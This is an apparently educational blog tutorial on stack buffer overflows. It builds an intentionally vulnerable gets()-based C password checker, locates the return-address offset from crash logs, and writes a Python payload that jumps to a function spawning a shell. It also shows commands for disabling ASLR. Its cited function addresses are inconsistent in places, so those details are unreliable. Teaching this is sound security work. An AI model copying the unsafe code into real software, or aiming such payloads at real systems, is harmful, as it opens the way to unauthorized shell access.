Understanding Buffer Overrun Exploits
25 Oct 2024Introduction
Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.
Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.
In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.
Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.
Password Validator Example
In the following example, the program will ask for input from the user and validate it against a password stored on the server.
void do_super_admin_things() {
system("/bin/sh");
}
int main(int argc, char *argv[]) {
if (validate_password()) {
do_super_admin_things();
} else {
printf("ERROR: Bad password\n");
}
return 0;
}
do_super_admin_things
is our example. It might be an admin shell, or something else. The point is this program is
trying to control access to that function by making sure you have the password, first!
The validate_password
function is responsible for getting that password in from the outside world. It’s prompts, and
then reads from stdin
. Note the use of gets()
.
int validate_password() {
char password_attempt[64];
printf("What is the password? ");
gets(password_attempt);
return check_password(password_attempt);
}
Warning About gets
The usage of gets()
here is highly frowned upon because of how insecure it is. Below are notes from the man page for
it:
BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.
The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it has been deprecated from
the C99 standard as per §7.26.13
:
The gets function is obsolescent, and is deprecated.
If there’s one thing to learn from this section, it’s don’t use gets()
.
To get this code to compile, I had to relax some of the standard rules and mute certain warnings:
gcc vuln1.c -m32 -std=c89 -Wno-deprecated-declarations -fno-stack-protector -g -o vuln1
Checking the Password
The check_password
function reads a file from disk that contains the super-secret password, then compares the attempt
to the correct password.
int check_password(char *attempt) {
char password[256];
int fd = 0;
if ((fd = open("./the-password", O_RDONLY)) < 0) {
perror("open");
return 0;
}
ssize_t read_bytes = read(fd, password, 256);
if (password[read_bytes - 1] == 0xa) {
password[read_bytes - 1] = 0x0;
}
close(fd);
return strncmp(password, attempt, strlen(password)) == 0;
}
Crashes
Initially, if you provide any normal input, the program behaves as expected:
What is the password? AAAAAAAAAAAA
ERROR: Bad password
But if you push the input a bit further, exceeding the bounds of the password_attempt
buffer, you can trigger a crash:
What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1] 60406 segmentation fault (core dumped) ./vuln1
The program crashes due to a segmentation fault. Checking dmesg
gives us more information:
$ dmesg | tail -n 5
[ 4442.984159] vuln1[60406]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9a5670 error 14 likely on CPU 19 (core 35, socket 0)
[ 4442.984189] Code: Unable to access opcode bytes at 0x41414117.
Notice the 41414141
pattern. This is significant because it shows that the capital A’s from our input (0x41
in
hexadecimal) are making their way into the instruction pointer (ip
). The input we provided has overflowed into crucial
parts of the stack, including the instruction pointer.
You can verify that 0x41
represents ‘A’ by running the following command:
echo -e "\x41\x41\x41\x41"
AAAA
Controlling the Instruction Pointer
This works because the large input string is overflowing the password_attempt
buffer. This buffer is a local variable
in the validate_password
function, and in the stack, local variables are stored just below the return address. When
password_attempt
overflows, the excess data overwrites the return address on the stack. Once overwritten, we control
what address the CPU will jump to after validate_password
finishes.
Maybe, we could find the address of the do_super_admin_things
function and simply jump directly to it. In order to do
this, we need to find the address. Only the name of the function is available to us in the source code, and the address
of the function is determined at compile time; so we need to lean on some other tools in order to gather this intel.
By using objdump
we can take a look inside of the compiled executable and get this information.
objdump -d vuln1
This will decompile the vuln1
program and give us the location of each of the functions. We search for the function
that we want (do_super_admin_things
):
00001316 <do_super_admin_things>:
1316: 55 push %ebp
1317: 89 e5 mov %esp,%ebp
1319: 53 push %ebx
We find that it’s at address 00001316
. We need to take note of this value as we’ll need it shortly.
Now we need to find the spot among that big group of A’s that we’re sending into the input, exactly where the right spot
is, where we can inject our address onto the stack. We’ve already got some inside knowledge about our buffer. It’s 64
bytes in length.
We really need a magic mark in the input so we can determine where to send our address in. We can do that with some well known payload data. We re-run the program with our 64 A’s but we also add a pattern of characters afterwards:
What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF
[1] 60406 segmentation fault (core dumped) ./vuln1
This seg faults again, but you can see the BBBBCCCCDDDDEEEEFFFF
at the end of the 64 A’s. Looking at the log in
dmesg
now:
[ 9287.917223] vuln1[62745]: segfault at 45454545 ip 0000000045454545 sp 00000000ffa63b50 error 14 likely on CPU 18 (core 34, socket 0)
The 45454545
tells us which part of the input is being sent in as the return address. \x45
is the E
’s
echo -e "\x45\x45\x45\x45"
EEEE
That means that our instruction pointer will start at the E
’s.
Prepare the Payload
To make life easier for us, we’ll write a python script that will generate this payload for us. Note that this is using our function address from before.
#!/usr/bin/python
import sys
# fill out the original buffer
payload = b"A" * 64
# extra pad to skip to where we want our instruction pointer
payload += b"BBBBCCCCDDDD"
# address of our function "do_super_admin_things"
payload += b"\x16\x13\x00\x00"
sys.stdout.buffer.write(payload)
We can now inject this into the execution of our binary and achieve a shell:
$ (python3 payload.py; cat) | ./vuln1
ls
input payload.py the-password vuln1 vuln1.c
We use (python3 payload.py; cat)
here because of the shell’s handling of file descriptors. Without doing this and
simply piping the output, our shell would kill the file descriptors off.
Static vs. Runtime Addresses
When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.
For example, if we inspect the runtime address of 1do_super_admin_things` in GDB, we might see something like:
(gdb) info address do_super_admin_things
Symbol "do_super_admin_things" is at 0x56556326 in a file compiled without debugging.
This differs from the objdump
address 0x1326
, as it’s been shifted by the base address of the executable
(e.g., 0x56555000
in this case). This discrepancy is due to ASLR.
Temporarily Disabling ASLR for Demonstration
To ensure the addresses in objdump
match those at runtime, we can temporarily disable ASLR. This makes the program
load at consistent addresses, which is useful for demonstration and testing purposes.
To disable ASLR on Linux, run:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2
:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
Conclusion
In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and
demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump
, we could inspect static
addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.
Disabling ASLR temporarily allowed us to match objdump
addresses to those at runtime, making the exploit demonstration
clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a
program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.
Understanding and practicing secure coding, such as avoiding vulnerable functions like gets()
and implementing stack
protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices
create a layered approach to security, significantly enhancing the resilience of software.
Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.